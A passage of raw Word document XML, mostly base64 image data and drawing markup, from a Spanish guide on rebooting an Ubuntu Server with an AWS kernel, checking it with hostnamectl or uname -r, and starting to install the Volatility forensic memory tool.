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w/fNryIE&#10;AAC8CwAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAKAAAAAAAAACEALNuo&#10;/BFHAAARRwAAFAAAAAAAAAAAAAAAAACIBgAAZHJzL21lZGlhL2ltYWdlMS5wbmdQSwECLQAKAAAA&#10;AAAAACEA1yh9TuEtAADhLQAAFAAAAAAAAAAAAAAAAADLTQAAZHJzL21lZGlhL2ltYWdlMi5wbmdQ&#10;SwECLQAUAAYACAAAACEALvAODOEAAAAKAQAADwAAAAAAAAAAAAAAAADeewAAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAC5s8ADFAAAApQEAABkAAAAAAAAAAAAAAAAA7HwAAGRycy9fcmVs&#10;cy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAcABwC+AQAA6H0AAAAA&#10;">
                <v:group id="_x0000_s1065" style="position:absolute;width:54170;height:18199" coordsize="53902,17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y2RygAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/NasJA&#10;FIX3Bd9huIK7OhOt1qaOImJLF1JQC+LukrkmwcydkBmT+PadRaHLw/njW657W4mWGl861pCMFQji&#10;zJmScw0/p4/nBQgfkA1WjknDgzysV4OnJabGdXyg9hhyEUfYp6ihCKFOpfRZQRb92NXE0bu6xmKI&#10;ssmlabCL47aSE6Xm0mLJ8aHAmrYFZbfj3Wr47LDbTJNdu79dt4/LafZ93iek9WjYb95BBOrDf/iv&#10;/WU0vL28qplaTCJERIo4IFe/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABYHLZHKAAAA&#10;4gAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:shape id="Imagen 16" o:spid="_x0000_s1066" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:23552;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8p5xwAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NasJA&#10;EL4X+g7LCN7qxsVKk7pKESop9GLsxduQnSbB7GyaXU18e7cgeJzvf1ab0bbiQr1vHGuYzxIQxKUz&#10;DVcafg6fL28gfEA22DomDVfysFk/P60wM27gPV2KUIkYwj5DDXUIXSalL2uy6GeuI47cr+sthnj2&#10;lTQ9DjHctlIlyVJabDg21NjRtqbyVJytBjW4w5dpcPv3vdilR97nx7bItZ5Oxo93EIHG8BDf3bmJ&#10;85P5Mk1flVLw/1MEQK5vAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANpXynnHAAAA4wAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                    <v:imagedata r:id="rId123" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                  <v:shape id="Imagen 17" o:spid="_x0000_s1067" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;left:23809;top:1992;width:30093;height:1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5zPxwAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/disIw&#10;FITvF3yHcATv1rT2B6lGEWWXBa/8eYBDc2yLzUlpsra+/WZB8HKYmW+Y9XY0rXhQ7xrLCuJ5BIK4&#10;tLrhSsH18vW5BOE8ssbWMil4koPtZvKxxkLbgU/0OPtKBAi7AhXU3neFlK6syaCb2444eDfbG/RB&#10;9pXUPQ4Bblq5iKJcGmw4LNTY0b6m8n7+NQoOB86WmZHodo6GxfcxweuYKDWbjrsVCE+jf4df7R+t&#10;IE2zOM7TPIH/S+EOyM0fAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADQvnM/HAAAA4gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                    <v:imagedata r:id="rId124" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                  </v:shape>
                </v:group>
                <v:shape id="_x0000_s1068" type="#_x0000_t202" style="position:absolute;top:18546;width:53911;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b5YzAAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BT8Mw&#10;DIXvSPyHyEhcEEsLU6jKsmmaQAIuE2UXblHjNYXGqZJ0K/8eH5A42n5+732rzewHccKY+kAaykUB&#10;AqkNtqdOw+Hj+bYCkbIha4ZAqOEHE2zWlxcrU9twpnc8NbkTbEKpNhpczmMtZWodepMWYUTi2zFE&#10;bzKPsZM2mjOb+0HeFYWS3vTECc6MuHPYfjeT17Bffu7dzXR8etsu7+PrYdqpr67R+vpq3j6CyDjn&#10;f/Hf94vl+qV6qCpVKqZgJl6AXP8CAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA6FG+WMwA&#10;AADjAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="729C0E31" w14:textId="1DA11EF1" w:rsidR="00A54B94" w:rsidRPr="00256D2C" w:rsidRDefault="00A54B94" w:rsidP="00A54B94">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>16</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="50" w:name="_Toc155782583"/>
                        <w:r w:rsidRPr="006417B9">
                          <w:t>Reiniciando Ubuntu Server y comprobando funcionamiento kernel AWS.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="50"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003E619D" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez reiniciado el sistema, procedemos a ejecutar el comando </w:t>
      </w:r>
      <w:r w:rsidR="003E619D" w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>hostnamectl</w:t>
      </w:r>
      <w:r w:rsidR="003E619D" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidR="003E619D" w:rsidRPr="004139F5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>uname -r</w:t>
      </w:r>
      <w:r w:rsidR="003E619D" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> para comprobar que el comando se ha ejecutado correctamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35EBBE" w14:textId="01E66D41" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="00F7567F">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:t>Instalación y creación del perfil de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009B1250">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7C784E" w14:textId="53F7279E" w:rsidR="009B1250" w:rsidRPr="009B1250" w:rsidRDefault="009B1250" w:rsidP="009B1250">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Una vez comprobado, procederemos a la instalación de volatility</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="000B7784">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Volatility: Herramienta de análisis de memoria forense.</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9B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el servidor de </w:t>
      </w:r>
      <w:r w:rsidR="000866BC" w:rsidRPr="009B1250">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
